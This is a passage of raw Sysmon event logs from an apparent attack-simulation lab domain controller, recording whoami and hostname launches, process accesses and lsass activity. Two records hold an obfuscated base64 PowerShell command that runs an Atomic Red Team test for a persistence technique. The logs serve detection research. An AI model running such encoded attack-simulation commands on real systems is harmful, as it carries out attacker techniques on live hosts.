32\ntdll.dll+51791 10341000x80000000000000004407Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004406Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004405Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004404Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85A0-5FCF-DC00-000000009101}1172C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004403Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-85A0-5FCF-DA00-000000009101}4116860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A0-5FCF-DC00-000000009101}1172C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66672516(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b12df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+665c46d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65ad3987(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b31e56(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b1534c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b072d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13804(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b133a0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b12df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+665c46d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65ad3987(wow64) 154100x80000000000000004402Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.874{10ACEC4A-85A0-5FCF-DC00-000000009101}1172C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-859F-5FCF-CB41-080000000000}0x841cb0HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{10ACEC4A-85A0-5FCF-DA00-000000009101}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQA1ADQANgAuADAAMAAzACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 10341000x80000000000000004401Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-859F-5FCF-D300-000000009101}50044516C:\Windows\system32\conhost.exe{10ACEC4A-85A0-5FCF-DB00-000000009101}736C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004400Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004399Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004398Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004397Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004396Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004395Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004394Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004393Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004392Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85A0-5FCF-DB00-000000009101}736C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004391Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004390Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-85A0-5FCF-DA00-000000009101}4116860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A0-5FCF-DB00-000000009101}736C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66672516(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b12df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+665c46d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65ad3987(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b31e56(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b1534c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b072d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13804(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b133a0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b12df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+665c46d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65ad3987(wow64) 154100x80000000000000004389Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.864{10ACEC4A-85A0-5FCF-DB00-000000009101}736C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-859F-5FCF-CB41-080000000000}0x841cb0HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{10ACEC4A-85A0-5FCF-DA00-000000009101}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQA1ADQANgAuADAAMAAzACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 10341000x80000000000000004388Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.505{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-85A0-5FCF-DA00-000000009101}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004387Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 